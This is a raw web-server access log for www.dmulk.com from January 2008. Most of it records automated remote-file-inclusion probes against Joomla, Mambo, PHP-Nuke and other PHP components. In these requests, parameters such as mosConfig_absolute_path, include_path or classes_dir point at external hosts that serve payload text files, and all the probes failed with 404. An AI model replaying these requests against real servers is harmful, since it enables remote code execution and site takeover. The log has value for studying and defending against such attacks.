151.1.141.17 - - [03/Jan/2008:09:32:21 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:09:32:55 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.71.208.184 - - [03/Jan/2008:09:33:22 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.208.184 - - [03/Jan/2008:09:33:22 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.208.184 - - [03/Jan/2008:09:33:25 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:09:34:58 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.162.162.251 - - [03/Jan/2008:09:35:14 -0800] "GET /logs/access_071218.log/adodbt/sql.php?classes_dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????http://asterweb.com.br/cav/s.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [03/Jan/2008:09:35:14 -0800] "GET /adodbt/sql.php?classes_dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????http://asterweb.com.br/cav/s.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [03/Jan/2008:09:35:14 -0800] "GET /logs/adodbt/sql.php?classes_dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????http://asterweb.com.br/cav/s.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.29.29 - - [03/Jan/2008:09:35:14 -0800] "GET /retreat1/?M=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:09:35:54 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.71.208.184 - - [03/Jan/2008:09:36:45 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.31.219 - - [03/Jan/2008:09:37:11 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.tokyowww.com/alat/echo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.31.219 - - [03/Jan/2008:09:37:11 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.tokyowww.com/alat/echo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.31.219 - - [03/Jan/2008:09:37:11 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.tokyowww.com/alat/echo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.31.219 - - [03/Jan/2008:09:37:32 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.tokyowww.com/alat/echo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
151.1.141.17 - - [03/Jan/2008:09:38:30 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:09:39:00 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:09:39:01 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [03/Jan/2008:09:39:19 -0800] "GET /logs/access_071219.log/adodbt/sql.php?classes_dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????http://asterweb.com.br/cav/s.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [03/Jan/2008:09:39:32 -0800] "GET /funny/?N=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.31.219 - - [03/Jan/2008:09:40:00 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.tokyowww.com/alat/echo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:09:45:30 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [03/Jan/2008:09:45:30 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:45:46 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:45:50 -0800] "GET //index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:45:50 -0800] "GET /logs//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.208.184 - - [03/Jan/2008:09:46:03 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.208.184 - - [03/Jan/2008:09:46:03 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.208.184 - - [03/Jan/2008:09:46:06 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.85.9.104 - - [03/Jan/2008:09:48:14 -0800] "GET /logs/access_071219.log//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=include&autoLoadConfig%5b999%5d%5b0%5d%5bloadFile%5d=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:09:48:42 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:09:48:43 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:09:48:44 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:09:48:53 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.71.208.184 - - [03/Jan/2008:09:49:13 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:09:52:00 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:09:52:01 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.46.84 - - [03/Jan/2008:09:52:01 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.buysellghana.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.32.92.82 - - [03/Jan/2008:09:52:37 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.kennohost.ro/orders/admin/es.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
80.32.92.82 - - [03/Jan/2008:09:52:38 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.kennohost.ro/orders/admin/es.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
216.246.99.64 - - [03/Jan/2008:09:52:57 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.149.224.227 - - [03/Jan/2008:09:53:37 -0800] "GET /logs/access_071229.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_admin&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [03/Jan/2008:09:53:39 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_admin&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [03/Jan/2008:09:53:41 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_admin&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.71.208.184 - - [03/Jan/2008:09:55:05 -0800] "GET /logs/access_071214.log/admin.php?include_path=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.208.184 - - [03/Jan/2008:09:55:05 -0800] "GET /admin.php?include_path=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.208.184 - - [03/Jan/2008:09:55:05 -0800] "GET /logs/admin.php?include_path=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.48.80.141 - - [03/Jan/2008:09:55:05 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [03/Jan/2008:09:55:06 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [03/Jan/2008:09:55:06 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.149.224.227 - - [03/Jan/2008:09:57:00 -0800] "GET /logs/access_071214.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_admin&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [03/Jan/2008:09:57:13 -0800] "GET /logs/access_071214.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_admin&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.149.224.227 - - [03/Jan/2008:09:57:15 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_admin&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.48.80.141 - - [03/Jan/2008:09:58:03 -0800] "GET /logs/access_071222.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.108 - - [03/Jan/2008:09:58:28 -0800] "GET /plans/A3_ROOF_PLAN.pdf HTTP/1.0" 200 875475 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.42.97 - - [03/Jan/2008:09:59:11 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.shikea.se/file/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.42.97 - - [03/Jan/2008:09:59:11 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.shikea.se/file/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
203.111.38.130 - - [03/Jan/2008:10:00:48 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.19.171 - - [03/Jan/2008:10:04:45 -0800] "GET /bikes/CreSTOC07/?M=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:05:02 -0800] "GET /logs/access_071222.log/modules/Forums/favorites.php?nuke_bb_root_http://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:05:03 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_http://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:05:03 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_http://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:10:05:06 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:10:05:11 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:05:12 -0800] "GET /logs/access_071222.log/modules/Forums/favorites.php?nuke_bb_root_http://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:05:12 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_http://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:05:12 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_http://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:10:05:51 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.99.64 - - [03/Jan/2008:10:06:28 -0800] "GET /logs/access_071222.log/modules/Forums/favorites.php?nuke_bb_root_http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [03/Jan/2008:10:06:28 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:10:06:55 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:10:07:12 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:10:07:12 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:10:07:12 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:10:07:21 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:10:07:21 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:10:07:21 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:10:07:45 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:10:07:46 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [03/Jan/2008:10:07:46 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.130.55 - - [03/Jan/2008:10:08:48 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://aLie-a.biz/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.130.55 - - [03/Jan/2008:10:08:48 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://aLie-a.biz/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.130.55 - - [03/Jan/2008:10:08:48 -0800] "GET /modifyform.html?code=http://aLie-a.biz/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.130.55 - - [03/Jan/2008:10:08:48 -0800] "GET /modifyform.html?code=http://aLie-a.biz/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.130.55 - - [03/Jan/2008:10:08:48 -0800] "GET /logs/modifyform.html?code=http://aLie-a.biz/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.130.55 - - [03/Jan/2008:10:08:48 -0800] "GET /logs/modifyform.html?code=http://aLie-a.biz/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:10:09:16 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:10:09:16 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [03/Jan/2008:10:09:16 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:10:15 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:10:12:02 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.246.99.64 - - [03/Jan/2008:10:12:11 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:10:13:31 -0800] "GET /logs/access_071222.log/modules/Forums/favorites.php?nuke_bb_root_http://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:10:13:32 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_http://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
63.238.22.25 - - [03/Jan/2008:10:13:32 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_http://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.233.130.55 - - [03/Jan/2008:10:13:59 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://aLie-a.biz/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.130.55 - - [03/Jan/2008:10:13:59 -0800] "GET /logs/access_071214.log/modifyform.html?code=http://aLie-a.biz/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:14:48 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:14:48 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:14:48 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:14:48 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:14:49 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [03/Jan/2008:10:14:49 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://aLie-a.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.0.200.9 - - [03/Jan/2008:10:15:05 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.0.200.9 - - [03/Jan/2008:10:15:06 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.0.200.9 - - [03/Jan/2008:10:15:06 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.169 - - [03/Jan/2008:10:15:11 -0800] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.99.64 - - [03/Jan/2008:10:16:43 -0800] "GET /logs/access_071224.log/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [03/Jan/2008:10:16:43 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.phphttp://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
